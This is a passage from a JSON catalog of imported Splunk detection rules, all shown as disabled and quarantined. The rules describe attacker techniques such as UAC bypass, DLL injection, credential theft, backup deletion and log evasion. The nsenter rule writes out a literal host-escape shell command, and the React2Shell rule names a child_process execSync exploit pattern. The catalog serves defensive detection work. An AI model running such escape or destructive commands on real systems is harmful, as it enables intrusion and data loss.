If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msi-module-loaded-by-non-system-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccb98a66-5851-11ec-b91c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msi_module_loaded_by_non_system_binary.yml" } }, { "id": "splunk-security-content-ccc3246a-daa1-11ea-87d0-0242ac130022", "type": "detection", "name": "Detect GCP Storage access from a new IP", "description": "The following analytic identifies access to GCP Storage buckets from new or previously unseen remote IP addresses. It leverages GCP Storage bucket-access logs ingested via Cloud Pub/Sub and compares current access events against a lookup table of previously seen IP addresses. This activity is significant as it may indicate unauthorized access or potential reconnaissance by an attacker. 
If confirmed malicious, this could lead to data exfiltration, unauthorized data manipulation, or further compromise of the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-gcp-storage-access-from-a-new-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccc3246a-daa1-11ea-87d0-0242ac130022", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_gcp_storage_access_from_a_new_ip.yml" } }, { "id": "splunk-security-content-ccd6a38c-d40b-11eb-85a5-acde48001122", "type": "detection", "name": "Allow Network Discovery In Firewall", "description": "The following analytic detects a suspicious modification to the firewall to allow network discovery on a machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving the 'netsh' command to enable network discovery. This activity is significant because it is commonly used by ransomware, such as REvil and RedDot, to discover and compromise additional machines on the network. 
If confirmed malicious, this could lead to widespread file encryption across multiple hosts, significantly amplifying the impact of the ransomware attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-network-discovery-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccd6a38c-d40b-11eb-85a5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_network_discovery_in_firewall.yml" } }, { "id": "splunk-security-content-cce357cf-43a4-494a-814b-67cea90fe990", "type": "detection", "name": "Kubernetes Pod With Host Network Attachment", "description": "The following analytic detects the creation or update of a Kubernetes pod with host network attachment. It leverages Kubernetes Audit logs to identify pods configured with host network settings. This activity is significant for a SOC as it could allow an attacker to monitor all network traffic on the node, potentially capturing sensitive information and escalating privileges. 
If confirmed malicious, this could lead to unauthorized access, data breaches, and service disruptions, severely impacting the security and integrity of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-pod-with-host-network-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce357cf-43a4-494a-814b-67cea90fe990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_pod_with_host_network_attachment.yml" } }, { "id": "splunk-security-content-cce58e2c-988a-4319-9390-0daa9eefa3cd", "type": "detection", "name": "Windows Bypass UAC via Pkgmgr Tool", "description": "The following analytic detects the execution of the deprecated 'pkgmgr.exe' process with an XML input file, which is unusual and potentially suspicious. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution details and command-line arguments. The significance lies in the deprecated status of 'pkgmgr.exe' and the use of XML files, which could indicate an attempt to bypass User Account Control (UAC). 
If confirmed malicious, this activity could allow an attacker to execute commands with elevated privileges, leading to potential system compromise and unauthorized changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bypass-uac-via-pkgmgr-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce58e2c-988a-4319-9390-0daa9eefa3cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml" } }, { "id": "splunk-security-content-cce82b81-c716-4b6c-bac9-33e6a6925cc2", "type": "detection", "name": "Windows Wmic Network Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands used for network interface discovery on a Windows system. Specifically, it identifies commands such as \u201cwmic nic\u201d that retrieve detailed information about the network adapters installed on the device. While these commands are commonly used by IT administrators for legitimate network inventory and diagnostics, they can also be leveraged by malicious actors for reconnaissance, enabling them to map network configurations and identify potential targets. 
Monitoring WMIC network interface queries allows security teams to detect suspicious or unauthorized enumeration activities, supporting early threat identification and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-network-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce82b81-c716-4b6c-bac9-33e6a6925cc2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_network_discovery.yml" } }, { "id": "splunk-security-content-ccf4b61b-1b26-4f2e-a089-f2009c569c57", "type": "detection", "name": "Windows Binary Proxy Execution Mavinject DLL Injection", "description": "The following analytic detects the use of mavinject.exe for DLL injection into running processes, identified by specific command-line parameters such as /INJECTRUNNING and /HMODULE. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because it indicates potential arbitrary code execution, a common tactic for malware deployment and persistence. 
If confirmed malicious, this could allow attackers to execute unauthorized code, escalate privileges, and maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-binary-proxy-execution-mavinject-dll-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccf4b61b-1b26-4f2e-a089-f2009c569c57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml" } }, { "id": "splunk-security-content-ccf6b7a3-bd39-4bc9-a949-143a8d640dbc", "type": "detection", "name": "CrushFTP Server Side Template Injection", "description": "This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. 
The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-server-side-template-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccf6b7a3-bd39-4bc9-a949-143a8d640dbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/crushftp_server_side_template_injection.yml" } }, { "id": "splunk-security-content-ccfeddec-43ec-11ec-b494-acde48001122", "type": "detection", "name": "Windows InstallUtil Credential Theft", "description": "The following analytic detects instances where the Windows InstallUtil.exe binary loads `vaultcli.dll` and `Samlib.dll`. This detection leverages Sysmon EventCode 7 to identify these specific DLL loads. This activity is significant because it can indicate an attempt to execute code that bypasses application control and captures credentials using tools like Mimikatz. 
If confirmed malicious, this behavior could allow an attacker to steal credentials, potentially leading to unauthorized access and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-credential-theft.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccfeddec-43ec-11ec-b494-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_credential_theft.yml" } }, { "id": "splunk-security-content-cd07120d-4265-481a-ba0f-3b91fbc5a02f", "type": "detection", "name": "Cisco Isovalent - Nsenter Usage in Kubernetes Pod", "description": "This analytic detects the execution of the nsenter utility from within a container, a technique often used for exploitation and container escape. Nsenter allows an attacker to enter the namespaces of another process\u2014such as the host's init process (PID 1)\u2014and execute a shell or other binaries with elevated privileges. For example, an attacker may use docker exec to gain a shell in a container, enumerate the PID of a target container or the host, and then use nsenter to access all namespaces (mount, UTS, IPC, net, pid) of the host or another container. Example to escape to the host: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash`. 
The WorkloadAncestorsBinary field is used to track the ancestry of the process; this is useful for understanding the context of the nsenter usage.\n\nThe options -m -u -n -i -p correspond to the various Linux namespaces. Adversaries exploit nsenter when pods are misconfigured with excessive privileges (e.g., privileged, hostPID, or broad hostPath mounts), enabling them to interact with the underlying node filesystem and processes. This can be an indicator of a container escape attempt or privilege escalation. Security teams should pay close attention to any nsenter invocation from within containers, especially outside of normal maintenance activity or in workloads with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-nsenter-usage-in-kubernetes-pod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd07120d-4265-481a-ba0f-3b91fbc5a02f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___nsenter_usage_in_kubernetes_pod.yml" } }, { "id": "splunk-security-content-cd0e816f-f67d-4dbe-a153-480b546e867e", "type": "detection", "name": "Cisco NVM - Suspicious File Download via Headless Browser", "description": "This analytic identifies the use of Chromium-based browsers (like Microsoft Edge) running in headless mode with the `--dump-dom` argument.\nThis behavior has been observed in attack campaigns such as DUCKTAIL, where browsers are automated to stealthily 
download content from the internet using direct URLs or suspicious hosting platforms.\nThe detection focuses on identifying connections to known file-sharing domains or direct IPs extracted from command-line arguments and cross-checks those against the destination of the flow.\nSince it leverages Cisco Network Visibility Module telemetry, the rule triggers only if a network connection is made.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-file-download-via-headless-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd0e816f-f67d-4dbe-a153-480b546e867e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_file_download_via_headless_browser.yml" } }, { "id": "splunk-security-content-cd15c0a8-470e-4b12-9517-046e4927db30", "type": "detection", "name": "O365 Mailbox Folder Read Permission Granted", "description": "The following analytic identifies instances where read permissions are granted to mailbox folders within an Office 365 environment. It detects this activity by monitoring the `o365_management_activity` data source for the `Set-MailboxFolderPermission` and `Add-MailboxFolderPermission` operations. This behavior is significant as it may indicate unauthorized access or changes to mailbox folder permissions, potentially exposing sensitive email content. 
If confirmed malicious, an attacker could gain unauthorized access to read email communications, leading to data breaches or information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-folder-read-permission-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd15c0a8-470e-4b12-9517-046e4927db30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_folder_read_permission_granted.yml" } }, { "id": "splunk-security-content-cd2cf33c-9201-11eb-a10a-acde48001122", "type": "detection", "name": "Disable Registry Tool", "description": "The following analytic detects modifications to the Windows registry aimed at disabling the Registry Editor (regedit). It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" with a value of \"0x00000001\". This activity is significant because malware, such as RATs or trojans, often disable registry tools to prevent the removal of their entries, aiding in persistence and defense evasion. 
If confirmed malicious, this could hinder incident response efforts and allow the attacker to maintain control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-registry-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd2cf33c-9201-11eb-a10a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_registry_tool.yml" } }, { "id": "splunk-security-content-cd5aed7e-5cea-11eb-ae93-0242ac130002", "type": "detection", "name": "WBAdmin Delete System Backups", "description": "The following analytic detects the execution of wbadmin.exe with flags that delete backup files, specifically targeting catalog or system state backups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is commonly used by ransomware to prevent recovery by deleting system backups. 
If confirmed malicious, this action could severely hinder recovery efforts, leading to prolonged downtime and potential data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wbadmin-delete-system-backups.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd5aed7e-5cea-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wbadmin_delete_system_backups.yml" } }, { "id": "splunk-security-content-cd6d7410-9146-4471-a418-49edba6dadc4", "type": "detection", "name": "Windows Modify System Firewall with Notable Process Path", "description": "The following analytic detects suspicious modifications to system firewall rules, specifically allowing execution of applications from notable and potentially malicious file paths. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving firewall rule changes. This activity is significant as it may indicate an adversary attempting to bypass firewall restrictions to execute malicious files. 
If confirmed malicious, this could allow attackers to execute unauthorized code, potentially leading to further system compromise, data exfiltration, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-system-firewall-with-notable-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd6d7410-9146-4471-a418-49edba6dadc4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml" } }, { "id": "splunk-security-content-cd80a6ac-c9d9-11eb-8839-acde48001122", "type": "detection", "name": "Clear Unallocated Sector Using Cipher App", "description": "The following analytic detects the execution of `cipher.exe` with the `/w` flag to clear unallocated sectors on a disk. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and parent processes. This activity is significant because it is a technique used by ransomware to prevent forensic recovery of deleted files. 
If confirmed malicious, this action could hinder incident response efforts by making it impossible to recover critical data, thereby complicating the investigation and remediation process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clear-unallocated-sector-using-cipher-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd80a6ac-c9d9-11eb-8839-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clear_unallocated_sector_using_cipher_app.yml" } }, { "id": "splunk-security-content-cda04e9c-1950-43ab-87d6-e333a3d7f107", "type": "detection", "name": "Linux Suspicious React or Next.js Child Process", "description": "This analytic detects Linux processes such as sh, bash, and common Linux LOLBINs being spawned by React or Next.js application servers.\nIn the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is commonly used to invoke Node's child_process APIs (for example child_process.execSync) to run OS-level commands.\nPublic proof-of-concept payloads and observed in-the-wild exploit traffic show patterns where the vulnerable React Server Components handler triggers process.mainModule.require('child_process').execSync() to execute binaries such as ping, curl, or arbitrary shells on the underlying host.\nThis detection focuses on suspicious child processes where a 
Next/React server process spawns an uncommon process.\nSuch activity might be a strong indicator of exploitation of the aforementioned vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-suspicious-react-or-next-js-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cda04e9c-1950-43ab-87d6-e333a3d7f107", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_suspicious_react_or_next_js_child_process.yml" } }, { "id": "splunk-security-content-cde00c31-042a-4307-bf70-25e471da56e9", "type": "detection", "name": "Windows New Service Security Descriptor Set Via Sc.EXE", "description": "The following analytic detects changes in a service security descriptor.\nIt leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting any service.\nThis behavior can be legitimate, such as when a user or administrator is configuring a service's security settings.\nInvestigate appropriate services to determine if the behavior is malicious.\nIf confirmed malicious, this could allow an attacker to escalate their privileges, blind defenses and more.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-service-security-descriptor-set-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cde00c31-042a-4307-bf70-25e471da56e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_service_security_descriptor_set_via_sc_exe.yml" } }, { "id": "splunk-security-content-cde75cf6-3c7a-4dd6-af01-27cdb4511fd4", "type": "detection", "name": "Malicious PowerShell Process With Obfuscation Techniques", "description": "The following analytic detects PowerShell processes launched with command-line arguments indicative of obfuscation techniques. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and complete command-line executions. This activity is significant because obfuscated PowerShell commands are often used by attackers to evade detection and execute malicious scripts. 
If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, or persistent access within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-with-obfuscation-techniques.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cde75cf6-3c7a-4dd6-af01-27cdb4511fd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml" } }, { "id": "splunk-security-content-ce058d6c-79f2-11ec-b476-acde48001122", "type": "detection", "name": "Ping Sleep Batch Command", "description": "The following analytic identifies the execution of ping sleep batch commands.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process command-line details.\nThis activity is significant as it indicates an attempt to delay malicious code execution, potentially evading detection or sandbox analysis.\nIf confirmed malicious, this technique allows attackers to bypass security measures, making it harder to detect and analyze their activities, thereby increasing the risk of prolonged unauthorized access and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ping-sleep-batch-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce058d6c-79f2-11ec-b476-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ping_sleep_batch_command.yml" } }, { "id": "splunk-security-content-ce1c0e2b-9303-4903-818b-0d9002fc6ea4", "type": "detection", "name": "AWS Defense Evasion PutBucketLifecycle", "description": "The following analytic detects `PutBucketLifecycle` events in AWS CloudTrail logs where a user sets a lifecycle rule for an S3 bucket with an expiration period of fewer than three days. This detection leverages CloudTrail logs to identify suspicious lifecycle configurations. This activity is significant because attackers may use it to delete CloudTrail logs quickly, thereby evading detection and impairing forensic investigations. 
If confirmed malicious, this could allow attackers to cover their tracks, making it difficult to trace their actions and respond to the breach effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-putbucketlifecycle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce1c0e2b-9303-4903-818b-0d9002fc6ea4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_putbucketlifecycle.yml" } }, { "id": "splunk-security-content-ce245717-779b-483b-bc52-fc7a94729973", "type": "detection", "name": "Windows Chromium Process with Disabled Extensions", "description": "The following analytic detects instances of Chromium-based browser processes on Windows launched with extensions explicitly disabled via command-line arguments. Disabling extensions can be used by automation frameworks, testing tools, or headless browser activity, but may also indicate defense evasion or abuse of browser functionality by malicious scripts or malware. This behavior reduces browser visibility and bypasses user-installed security extensions, making it relevant for detecting non-interactive execution, suspicious automation, or living-off-the-land techniques. 
Analysts should validate execution context, parent process, and command-line parameters to determine legitimacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-with-disabled-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce245717-779b-483b-bc52-fc7a94729973", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_with_disabled_extensions.yml" } }, { "id": "splunk-security-content-ce27646e-d411-11eb-8a00-acde48001122", "type": "detection", "name": "Allow File And Printing Sharing In Firewall", "description": "The following analytic detects the modification of firewall settings to allow file and printer sharing. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving 'netsh' commands that enable file and printer sharing. This activity is significant because it can indicate an attempt by ransomware to discover and encrypt files on additional machines connected to the compromised host. 
If confirmed malicious, this could lead to widespread file encryption across the network, significantly increasing the impact of a ransomware attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-file-and-printing-sharing-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce27646e-d411-11eb-8a00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml" } }, { "id": "splunk-security-content-ce2bde4d-a1d4-4452-8c87-98440e5adfb3", "type": "detection", "name": "Linux Auditd Shred Overwrite Command", "description": "The following analytic detects the execution of the 'shred' command on a Linux machine, which is used to overwrite files to make them unrecoverable. It leverages data from Linux Auditd, focusing on process names and command-line arguments. This activity is significant because the 'shred' command can be used in destructive attacks, such as those seen in the Industroyer2 malware targeting energy facilities. 
